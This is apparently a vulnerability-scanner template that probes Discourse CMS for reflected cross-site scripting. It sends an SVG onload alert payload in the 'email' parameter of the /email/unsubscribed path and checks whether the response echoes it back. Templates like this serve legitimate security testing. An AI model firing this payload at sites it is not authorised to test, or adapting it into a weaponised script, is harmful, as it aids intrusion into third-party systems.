id: discourse-cms-xss
info:
  name: Discourse CMS XSS
  risk: Medium

params:
  - root: '{{.BaseURL}}'

requests:
  - method: GET
    redirect: false
    url: >-
     {{.root}}/email/unsubscribed?email=jj@gmail.com%27"><svg/onload=alert(2)>
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("resHeader", 'application/html') && StringSearch("response", "<svg/onload=alert(2)>")


